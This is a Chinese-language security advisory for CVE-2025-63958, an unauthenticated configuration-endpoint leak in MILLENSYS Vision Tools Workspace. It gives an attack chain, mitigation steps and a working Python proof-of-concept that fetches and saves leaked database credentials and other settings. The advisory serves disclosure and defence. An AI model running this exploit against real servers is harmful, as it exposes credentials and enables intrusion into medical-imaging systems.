CVE-2025-63958: MILLENSYS Vision Tools Workspace 敏感配置信息泄露漏洞

漏洞信息

漏洞编号

CVE-2025-63958

漏洞类型

敏感信息泄露

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

MILLENSYS Vision Tools Workspace

漏洞概述

CVE-2025-63958是MILLENSYS Vision Tools Workspace 6.5.0.2585版本中存在的一个严重安全漏洞。该漏洞源于敏感配置端点/MILLENSYS/settings缺少访问控制机制，允许未经身份验证的远程攻击者直接访问该端点并获取大量敏感信息。泄露的信息包括明文数据库凭证、文件共享路径、内部许可证服务器配置以及软件更新参数等关键系统配置数据。攻击者利用这些泄露的敏感信息可以进一步进行横向移动和权限提升，最终可能导致整个系统的完全妥协。由于该漏洞无需任何认证即可利用，且CVSS评分高达9.8，属于紧急处理的安全漏洞，建议受影响的用户立即采取修复措施。

技术细节

MILLENSYS Vision Tools Workspace是一款专业的医学影像处理和管理软件。漏洞存在于该软件的Web服务组件中，具体位于/MILLENSYS/settings端点。该端点本应作为管理员配置界面，需要有效的会话认证才能访问，但由于开发过程中未实现适当的访问控制检查，导致任何未认证用户都可以直接通过HTTP GET请求访问该端点。攻击者通过构造简单的HTTP请求即可获取以下敏感信息：(1) 数据库连接凭证，包括数据库用户名和明文密码；(2) 网络文件共享路径和访问凭据；(3) 内部许可证服务器的配置参数；(4) 软件自动更新服务的端点URL和认证信息。这些信息为攻击者提供了多个攻击向量：利用数据库凭证可以访问或篡改应用数据；利用文件共享路径可以访问或修改共享文件；利用许可证服务器配置可以劫持授权服务；利用更新参数可以实施供应链攻击。

攻击链分析

STEP 1

步骤1

攻击者对目标MILLENSYS Vision Tools Workspace服务器进行侦察，发现Web服务端口（通常为8080或类似端口）

STEP 2

步骤2

攻击者构造HTTP GET请求访问未认证的敏感配置端点/MILLENSYS/settings

STEP 3

步骤3

服务器返回包含敏感配置的响应，包括明文数据库凭证、文件共享路径、许可证服务器配置等

STEP 4

步骤4

攻击者提取泄露的数据库凭据，使用这些凭证连接数据库进行数据窃取或篡改

STEP 5

步骤5

攻击者利用泄露的文件共享路径访问或修改共享文件，可能包含敏感业务数据

STEP 6

步骤6

攻击者利用许可证服务器配置信息进行许可证劫持或服务中断

STEP 7

步骤7

攻击者利用软件更新参数实施供应链攻击，植入恶意更新包

STEP 8

步骤8

综合以上信息，攻击者实现对系统的完全控制，完成横向移动和权限提升

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-63958 PoC - MILLENSYS Vision Tools Workspace Information Disclosure
# Target: MILLENSYS Vision Tools Workspace <= 6.5.0.2585
# Endpoint: /MILLENSYS/settings

def exploit_cve_2025_63958(target_url):
    """
    Exploit for CVE-2025-63958
    Unauthenticated access to sensitive configuration endpoint
    """
    # Construct the vulnerable endpoint URL
    endpoint = "/MILLENSYS/settings"
    url = target_url.rstrip('/') + endpoint
    
    print(f"[*] Target: {target_url}")
    print(f"[*] Exploiting endpoint: {url}")
    
    try:
        # Send HTTP GET request without authentication
        headers = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }
        
        response = requests.get(url, headers=headers, timeout=10, verify=False)
        
        print(f"[+] Status Code: {response.status_code}")
        
        if response.status_code == 200:
            print(f"[!] VULNERABLE - Sensitive data exposed!")
            print(f"[+] Response Length: {len(response.text)} bytes")
            
            # Save the response for analysis
            with open('cve_2025_63958_leaked_data.html', 'w', encoding='utf-8') as f:
                f.write(response.text)
            print("[+] Leaked data saved to: cve_2025_63958_leaked_data.html")
            
            # Extract sensitive information patterns
            sensitive_patterns = [
                'password', 'database', 'connection', 'server',
                'credential', 'license', 'update', 'share'
            ]
            
            print("\n[*] Searching for sensitive data patterns...")
            for pattern in sensitive_patterns:
                if pattern.lower() in response.text.lower():
                    print(f"[+] Found potential sensitive data: {pattern}")
            
            return True
        else:
            print(f"[-] Endpoint returned status: {response.status_code}")
            return False
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return False

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: python {sys.argv[0]} <target_url>")
        print(f"Example: python {sys.argv[0]} http://target.com:8080")
        sys.exit(1)
    
    target = sys.argv[1]
    exploit_cve_2025_63958(target)

影响范围

MILLENSYS Vision Tools Workspace 6.5.0.2585及之前版本

防御指南

临时缓解措施

在官方补丁发布之前，建议采取以下临时缓解措施：(1) 使用网络层访问控制，限制对/MILLENSYS/settings端点的访问，仅允许受信任的管理IP访问；(2) 在反向代理或负载均衡器上配置认证要求，对所有管理端点强制实施基本认证或令牌认证；(3) 监控Web服务器的访问日志，及时发现和阻止异常的敏感端点访问行为；(4) 考虑暂时禁用或下线存在漏洞的配置功能，待官方修复后再恢复使用。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-63958
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-63958
3 Details https://www.cvedetails.com/cve/CVE-2025-63958/
4 VulDB https://vuldb.com/cve/CVE-2025-63958
5 Link https://ozex.gitlab.io/tricks_hacks/2025-11-19-cve-2025-63958/index.html
6 Link https://www.millensys.com/